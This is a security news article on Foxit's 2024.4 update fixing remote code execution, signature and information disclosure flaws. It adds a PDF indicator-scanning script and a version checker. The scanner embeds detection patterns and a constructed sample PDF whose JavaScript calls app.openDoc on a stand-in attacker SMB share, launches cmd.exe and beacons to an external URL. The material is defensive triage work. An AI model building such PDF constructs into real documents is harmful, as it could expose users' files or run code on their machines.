Foxit Addresses Remote Code Execution Flaws in PDF Reader and PDF Editor

### #PDFSecurity #FoxitUpdate #RemoteCodeExecution

Summary: Foxit has issued a critical security update for its PDF Reader and Editor to address multiple vulnerabilities, including risks of remote code execution and privilege escalation. Users are urged to upgrade to version 2024.4 to mitigate these threats.

Threat Actor: Unknown
Victim: Foxit Software

Key Points:

  • Untrusted URL Invocation lets a crafted PDF make the application fetch images and other content from external, untrusted servers without asking the user first.
  • Incorrect Signature Verification can mislead users into signing altered XFA documents.
  • Information Disclosure vulnerabilities enable exfiltration of sensitive data from file systems.
  • Use-After-Free vulnerabilities can lead to application crashes and remote code execution.
  • DLL Hijacking and Privilege Escalation can permit arbitrary code execution with SYSTEM privileges.

Foxit has released a crucial security update for its widely used Foxit PDF Reader and Foxit PDF Editor. The update, version 2024.4, resolves multiple vulnerabilities that pose significant risks, including remote code execution, privilege escalation, and information disclosure.

The security bulletin identifies several vulnerabilities affecting earlier versions of Foxit PDF Reader and Editor. These include:

  • Untrusted URL Invocation: A crafted PDF could make the application load attacker-controlled images or other content from external HTTP servers without user confirmation. As Foxit explained, “This occurs as the application loads images from all resources (including those untrusted) when parsing the image resources or fails to properly request user confirmation before getting or posting content from external HTTP servers.”
  • Incorrect Signature Verification: Manipulated XFA documents could deceive users into signing altered documents. Foxit notes, “The application improperly ignores the changes to the ‘/NeedsRendering’ key or ‘TextField’ field when verifying the XFA documents.”
  • Information Disclosure: Flaws in the handling of the JavaScript “app.openDoc” method and of “LaunchAction” entries allowed a crafted PDF to reach files on the local file system or on SMB servers and exfiltrate sensitive data. The bulletin highlights that the application “fails to provide a reasonable prompt for user confirmation” in these scenarios.
  • Use-After-Free Vulnerabilities: Malformed AcroForm and 3D page objects in a crafted PDF could trigger use-after-free conditions, crashing the application or allowing remote code execution. CVE-2024-49576 and CVE-2024-47810 were assigned to these issues.
  • DLL Hijacking and Privilege Escalation: Failure to use a secure DLL search path, together with weaknesses in the update mechanism, could allow attackers to execute arbitrary code with SYSTEM privileges.
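The bulletin items above all hinge on constructs an analyst can look for inside a suspicious PDF before it reaches a reader: Launch and URI actions, JavaScript calling app.openDoc, UNC paths pointing at SMB servers, external HTTP URLs, and XFA documents carrying /NeedsRendering. The script below is an added triage example written for this article; it is not Foxit's code and does not reproduce any exploit. It runs regexes over the raw PDF syntax and over any Flate-compressed streams it can inflate, because JavaScript is routinely hidden in compressed objects. The indicator names, the "needs review" rule and the sample PDF are all constructed for illustration; a real file should still go to a full parser or a sandbox.

```python
"""Indicator triage for PDFs, keyed to the constructs named in the Foxit bulletin.
Added example for this article (not Foxit code). Regex-based first pass only:
object streams, hex-encoded strings and non-Flate filters are not handled.
"""
import re
import zlib

# (indicator name, bytes regex, why it matters) - names are our own labels.
INDICATORS = [
    ("launch_action", re.compile(rb"/S\s*/Launch\b"), "LaunchAction opens an external file or program"),
    ("uri_action", re.compile(rb"/S\s*/URI\b"), "URI action triggers an outbound request"),
    ("submit_form", re.compile(rb"/S\s*/SubmitForm\b"), "SubmitForm POSTs content to an external server"),
    ("javascript", re.compile(rb"/JavaScript\b|/JS\b"), "embedded JavaScript"),
    ("app_opendoc", re.compile(rb"app\.openDoc\s*\("), "app.openDoc opens another document without a prompt"),
    ("xfa", re.compile(rb"/XFA\b"), "XFA form present"),
    ("needs_rendering", re.compile(rb"/NeedsRendering\s+true\b"), "/NeedsRendering true on an XFA document"),
    # Matches \\host\share and its PDF-string-escaped form \\\\host\\share.
    ("unc_path", re.compile(rb"(?:\\\\){1,2}[A-Za-z0-9._-]+(?:\\\\){1,2}[A-Za-z0-9._$-]+"), "UNC path: SMB target"),
    ("external_url", re.compile(rb"https?://[^\s()<>]+"), "external HTTP(S) URL"),
]

# Indicators that by themselves justify human review (example rule, not vendor guidance).
HIGH_CONFIDENCE = {"launch_action", "app_opendoc", "unc_path", "submit_form"}

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def inflate_streams(data: bytes) -> list[bytes]:
    """Best-effort zlib inflation of every stream body; non-Flate streams are skipped."""
    inflated = []
    for m in STREAM_RE.finditer(data):
        try:
            inflated.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # uncompressed or another filter: raw bytes are scanned anyway
    return inflated


def scan_pdf(data: bytes) -> dict[str, list[str]]:
    """Return {indicator: [matched snippets]} over the raw bytes and inflated streams."""
    buffers = [data] + inflate_streams(data)
    hits: dict[str, list[str]] = {}
    for name, pattern, _why in INDICATORS:
        for buf in buffers:
            for m in pattern.finditer(buf):
                hits.setdefault(name, []).append(m.group(0).decode("latin-1"))
    return hits


def needs_review(hits: dict[str, list[str]]) -> bool:
    """True when any high-confidence indicator fired."""
    return bool(HIGH_CONFIDENCE & hits.keys())


def build_sample_pdf() -> bytes:
    """Constructed sample: a PDF skeleton carrying the risky constructs in one file.
    It is not a working exploit and is not expected to render in a viewer."""
    js = rb'app.openDoc("\\\\attacker.example\\share\\lure.pdf");'
    compressed = zlib.compress(js)  # hides the JavaScript from a naive grep
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /NeedsRendering true "
        b"/OpenAction 4 0 R /AcroForm << /XFA 5 0 R >> >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [6 0 R] >> endobj\n",
        b"4 0 obj << /S /JavaScript /JS 7 0 R >> endobj\n",
        b"5 0 obj << /Length 0 >> stream\n\nendstream endobj\n",
        b"6 0 obj << /Subtype /Link /A << /S /Launch /F (cmd.exe) >> >> endobj\n",
        b"7 0 obj << /Length %d /Filter /FlateDecode >> stream\n" % len(compressed)
        + compressed + b"\nendstream endobj\n",
        b"8 0 obj << /S /URI /URI (http://tracker.example/beacon.png) >> endobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ])


BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    findings = scan_pdf(build_sample_pdf())
    for name, snippets in findings.items():
        print(f"{name:16s} {snippets[0]}")
    print("needs review:", needs_review(findings))
```

On the constructed sample the app.openDoc call and the UNC path are found only after the Flate stream is inflated, which is the point of the second pass: a grep over the raw file would report the Launch and URI actions and miss the SMB target.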

Foxit acknowledged contributions from security researchers, including Jörn Henkel, Mat Powell from Trend Micro Zero Day Initiative, and KPC of Cisco Talos.

The vulnerabilities impact:

  • Foxit PDF Reader: Versions 2024.3.0.26795 and earlier.
  • Foxit PDF Editor: A range of versions from 11.x to 2024.3.

These vulnerabilities affect Windows platforms, and users are encouraged to upgrade to version 2024.4 or later immediately.
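When checking an inventory of installed Foxit builds against the ranges above, compare version components numerically rather than as strings: lexically "2024.10" sorts before "2024.4". The helper below is an added example for this article, not a Foxit tool. It encodes the ranges exactly as this article summarises them (Reader up to and including 2024.3.0.26795; Editor from 11.x through 2024.3), with the upper bound for Editor treated as a prefix so that any 2024.3.x build counts as affected; the product labels "reader" and "editor" are our own. The vendor bulletin remains authoritative for the precise build numbers.

```python
"""Affected-version check for the Foxit Reader/Editor ranges quoted in this article.
Added example; the ranges are transcribed from the article, not from the vendor bulletin.
"""

# Reader: "2024.3.0.26795 and earlier" (full build number, inclusive).
READER_LAST_AFFECTED = "2024.3.0.26795"
# Editor: "11.x to 2024.3" (inclusive; the upper bound is a release prefix).
EDITOR_FIRST_AFFECTED = "11"
EDITOR_LAST_AFFECTED = "2024.3"


def parse_version(text: str) -> tuple[int, ...]:
    """'2024.3.0.26795' -> (2024, 3, 0, 26795); raises ValueError on junk."""
    return tuple(int(part) for part in text.strip().split("."))


def compare_prefix(version: str, bound: str) -> int:
    """Compare only as many components as the bound has.
    Returns -1, 0 or 1 like a classic cmp; missing components count as 0."""
    v, b = parse_version(version), parse_version(bound)
    v = (v + (0,) * len(b))[: len(b)]
    return (v > b) - (v < b)


def is_affected(product: str, version: str) -> bool:
    """True if the installed build falls inside the article's affected range."""
    if product == "reader":
        return compare_prefix(version, READER_LAST_AFFECTED) <= 0
    if product == "editor":
        return (compare_prefix(version, EDITOR_FIRST_AFFECTED) >= 0
                and compare_prefix(version, EDITOR_LAST_AFFECTED) <= 0)
    raise ValueError(f"unknown product: {product}")


if __name__ == "__main__":
    # Constructed inventory lines; the hostnames and builds are illustrative.
    inventory = [("ws01", "reader", "2024.3.0.26795"), ("ws02", "reader", "2024.4"),
                 ("ws03", "editor", "13.0.1"), ("ws04", "editor", "2024.4")]
    for host, product, version in inventory:
        print(host, product, version, "AFFECTED" if is_affected(product, version) else "ok")
```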


Source: https://securityonline.info/cve-2024-49576-and-cve-2024-47810-foxit-addresses-remote-code-execution-flaws